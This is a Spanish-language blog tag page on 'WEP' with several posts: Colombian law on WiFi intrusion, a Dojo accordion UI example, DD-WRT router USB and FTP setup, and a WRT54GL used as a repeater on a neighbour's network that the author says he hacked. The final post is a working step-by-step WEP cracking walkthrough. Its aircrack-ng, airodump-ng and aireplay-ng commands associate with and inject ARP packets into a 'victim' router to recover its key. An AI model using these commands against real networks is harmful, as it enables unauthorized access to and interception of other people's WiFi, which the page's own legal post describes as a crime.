Mostrando entradas con la etiqueta WEP. Mostrar todas las entradas
Mostrando entradas con la etiqueta WEP. Mostrar todas las entradas

8 de octubre de 2018

Implicaciones Legales de una Intrusión WiFi





Bajo la Ley 1273 de 2009, una intrusión a la red WiFi ajena puede estar cometiendo los siguientes delitos en Colombia:

Artículo 269A: Acceso abusivo a un sistema informático. «El que, sin autorización o por fuera de lo acordado, acceda en todo o en parte a un sistema informático protegido o no con una medida de seguridad»…

De acuerdo con el tipo de ataque se puede estar cometiendo:

Artículo 269B: Obstaculización ilegítima de sistema informático o red de telecomunicación.
«El que, sin estar facultado para ello, impida u obstaculice el funcionamiento o el acceso normal a un sistema informático, a los datos informáticos allí contenidos, o a una red de telecomunicaciones»…

La interceptación también es un delito, el dicho que dice “es que la señal ingresa a mi casa”:

Artículo 269C: Interceptación de datos informáticos. «El que, sin orden judicial previa intercepte datos informáticos en su origen, destino o en el interior de un sistema informático, o las emisiones electromagnéticas provenientes de un sistema informático que los transporte»…

Si solo es robo de la señal WiFi para obtener internet serian esos delitos mencionados, pero si la victima es un banco o una entidad del estado se le suma el siguiente articulo:

Artículo 269H: Circunstancias de agravación punitiva: «Las penas imponibles de acuerdo con los artículos descritos en este título, se aumentarán de la mitad a las tres cuartas partes si la conducta se cometiere:»

«1. Sobre redes o sistemas informáticos o de comunicaciones estatales u oficiales o del sector financiero, nacionales o extranjeros.»

La ley colombiana tiene leyes que permiten castigar a un delincuente informático, con solo intentar obtener la clave de la red WiFi del vecino sin su autorización.

Si el delincuente que se introduce furtivamente en la red WiFi del “vecino” con otros intereses a obtener internet gratis, puede aplicar otros delitos.


Notas y Referencias:

26 de marzo de 2013

Panel Acordion en Dojo


Ejemplo de Paneles colapasables en forma de acordion en dojo. (Accordion Pane with 2 or more open panels at the same time).



Dojo posee un componente que lo hace (ver aqui) , pero tiene un problema solo permite tener un panel abierto a la vez, mientras hay pantallas que necesitamos con multiples paneles abiertos.

El ejemplo usa dos componentes el TitlePane, para poner un titulo y el ContentPane para poner el contenido.

Ejemplo:

 <!DOCTYPE html>
<head>
<meta charset="utf-8">
<link rel="stylesheet" href="dojo-release-1.8.3/dijit/themes/claro/claro.css">
<title>Ejemplo: AccordionContainer</title>
</head>
<body class="claro">
<script src="dojo-release-1.8.3/dojo/dojo.js" data-dojo-config="isDebug:1, async:1"></script>
<p>Ejemplo Panel Colabasable (AccordionContainer)</p>
<div id="contenido_1">Contenido 1</div>
<div id="contenido_2">Contenido 2</div>
<div id="contenido_3">Contenido 3</div>

<script>
require(["dojo/ready", "dijit/layout/ContentPane","dijit/TitlePane", "dojo/dom"], function(ready, ContentPane, TitlePane, dom){
ready(function(){

var tc = dom.byId("ac_1");

var tp_1 = new TitlePane( {title:"Titulo 1",
style:"width:100%; max-height:450px;",
open:true
});

var cp_1 = new ContentPane({
style:"width:99%; max-height:400px;overflow: auto"
}).placeAt(tp_1.containerNode);

cp_1.startup();
cp_1.setContent(dom.byId("contenido_1"));
tp_1.startup();

var tp_2 = new TitlePane( {title:"Titulo 2",
style:"width:100%; max-height:450px;",
open:false
});

var cp_2 = new ContentPane({
style:"width:99%; max-height:400px;overflow: auto"
}).placeAt(tp_2.containerNode);

cp_2.startup();
cp_2.setContent(dom.byId("contenido_2"));
tp_2.startup();

var tp_3 = new TitlePane( {title:"Titulo 3",
style:"width:100%; max-height:450px;",
open:false
});

var cp_3 = new ContentPane({
style:"width:99%; max-height:400px;overflow: auto"
}).placeAt(tp_3.containerNode);

cp_3.startup();
cp_3.setContent(dom.byId("contenido_3"));
tp_3.startup();


//Adicionar mas paneles aqui
tc.appendChild(tp_1.domNode);
tc.appendChild(tp_2.domNode);
tc.appendChild(tp_3.domNode);

});

});
</script>

<div id="ac_1"></div>

</body>
</html>
Como agregar mas paneles:

var tp_4 = new TitlePane( {title:"Titulo 4",
          style:"width:100%; max-height:450px;",
          open:true
           });
                    
 var cp_4 = new ContentPane({
          style:"width:99%; max-height:400px;overflow: auto"
         }).placeAt(tp_4.containerNode);
                    
  cp_4.startup();

 // Aqui se adiciona el contenido al panel
  cp_4.setContent(dom.byId("contenido_1"));
  tp_4startup(); 


 Y se agrega la ultima linea:

 tc.appendChild(tp_4.domNode);

 El ejemplo funciona apartir de Dojo 1.7

Referencias:

Dojo en Wikipedia
Dojo

7 de junio de 2012

WRT160NL USB Storage


Al router le he adicionado una memoria USB de 2Gb, para almacenar e instalarle futuras apliaciones.

La memoria usb le cree 4 particiones de la siguiente forma:

  1. Particion uno de 128Mb para montar /opt/
  2. Particion dos de 128Mb para usarla como swap
  3. Particion tres de 1616Mb para montar /mnt/
  4. Particion cuadtro de 128Mb para montar /jffs/

Las particiones se crearon usando una distro linux,  para datos ext3, y swap.

La primer es habilitar el uso del usb y la memoria para esto vamos a "Services >> USB" y habilitamos el soporte USB y conectar la memoria.



Para compartir archivos de forma sencilla usaremos el servidor FTP que trae el firmware, para habilitarlo hacemos lo siguiente: vamos a "Services >> NAS " y habilitamos el servicio "proFTPD", para ingresar un usuario para tener acceso ingresamos en el area texto "User Password List", asi "usuario clave" donde ponemos en cada linea el usuario y la clave (se puede poner la clave en formato md5).



 Ahora que tenemos todo configurado podemos aplicar los cambios, pero falta algo como hacer que se monte las memoria y las particiones para usarlas? ... R:// de la siguiente forma, mediante un script al arranque del router.

Vamos a "Administration >> Commands" y agregamos el siguiente texto:

mount /dev/scsi/host0/bus0/target0/lun0/part3 /mnt/
sleep 4
sh /mnt/etc/config/begin-here.startup
 
Damos en el boton que dice: "Save Startup" y quedo guardado el scrip que monta una de las particiones, para montar las otras creamos un script que se llama "begin-here.startup" y los guardamos en "/mnt/etc/config/" pero primero creamos lo carpeta (en este punto podemos usar ya el servicio ftp entonces si la ip es 192.168.1.1 ingresamos ftp://192.168.1.1/  y podemos loguearnos con los datos anteriormente ingresados.






En el archivo que se crea ingresamos el siguiente texto:


#!/bin/sh

mount /dev/scsi/host0/bus0/target0/lun0/part1 /opt/
sleep 2
mount /dev/scsi/host0/bus0/target0/lun0/part4 /jffs/
sleep 2




Luego de tener esto ya nuestras particiones se montan de forma automatica, un ultimo paso es habilitar la particion JSSF, asi que se va ha "Administration >> Management" y buscamos "JSFF2 Support" lo habiltamos y listo.






Pasos extras para configurar windows y nos quede en el como una Ubicacion de Red, vamos al explorador de Windows (caso win7) y damos click-derecho y selecionamos Ubicacion de Red.

Ahora se nos despliega una ventana y damos "Siguiente" despues otravez "siguiente y llenamos el campo con la direccion que ya tenemos "ftp://192.168.1.1/".





Damos "Siguiente" y le quitamos la opcion que dice "Inciar sesion de forma anonima" he ingresamos nuestro usuario.


Ahora damos "Siguiente" y lugo "Finalizar" ahora en el explroador de windows tenemos nuestra carpeta.


Nota: cuando nos pida la contraseña podemos dar recordar para que haceda de forma automatica.

Fuente:
DD-WRT USB Storage

30 de mayo de 2012

WRT54GL


Los que ya los conocen es un buen router, con buen alcance y que se le pueden cambiar las antenas por unas mejores.

La configuracion principal que tiene en el momento es modo: Repeater, que permite este modo, conectarse a otra red (la del vecino, pero despues de haberla hackeado) y poder crear una Red Virtual para su (mi) propio uso. Ambas conexiones permiten tener seguridad independiente, poder tener su propio rango de IP, ya que la conexion WAN se hace por WIFI.

Aqui una fotico con las antenas nuevas (8dbi) que tiene:


Nota: Para lograr la configuracion descrita se necesita tener el Firmware DD-WRT v24 preSP2.

La versatilidad de este router esta en que se puede sustituir el firmware original por uno de terceros, ademas el firmware original esta basado en Linux.  

http://es.wikipedia.org/wiki/WRT54G
http://www.dd-wrt.com/site/index

1 de enero de 2011

Aircrack PTW

Aircrack-ng es un programa crackeador de claves 802.11 WEP y WPA/WPA2-PSK. Aircrack-ng puede recuperar la clave WEP una vez que se han capturado suficientes paquetes encriptados con airodump-ng.


Encontrar la clave WEP de una red WIFI por este método requiere que paquetes "arp request/reply", y solo trabaja con encriptacion de 128 y 64 bits. 


Cuando se usa aircrack v1.x es el ataque por defecto, para utilizar el anterior metodo se debe poner la opcion -k, para versiones anteriores de aircrack que soportan PTW se debe usar la opcion -z.


He utilizado este metodo que resulto ser muy efectivo con la version 0.9.1 en Windows, encontro la clave en menos de 1s'. 



Metodología usada:



  1. Poner la tarjeta en modo monitor: airmon-ng start rausb0
  2. Capturar los paquetes: airodump-ng -c [channel] -w [network] --bssid [bssid AP] rausb0
  3. Asociarse con el router victima: aireplay-ng -1 0 -a [BSSID AP] -h [MAC mia] -e [ESSID] rausb0
  4. Envio de ARP: aireplay-ng -3 -b [BSSID AP] -h [MAC mia] rausb0
    • En caso de que no se consigan: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [MAC AP] -h [MAC mia] rausb0     --> Use this packet? y
    • Otra opción es intentar conectarse con otra tarjeta o lapto a esta red para forzar paquetes arp.
  5. Después de generar suficientes paquetes ejecutar Aircrack-ng -a 1 -z archivo.cap
Ejecutar cada ítem anterior en consolas independientes.

Mas documentación: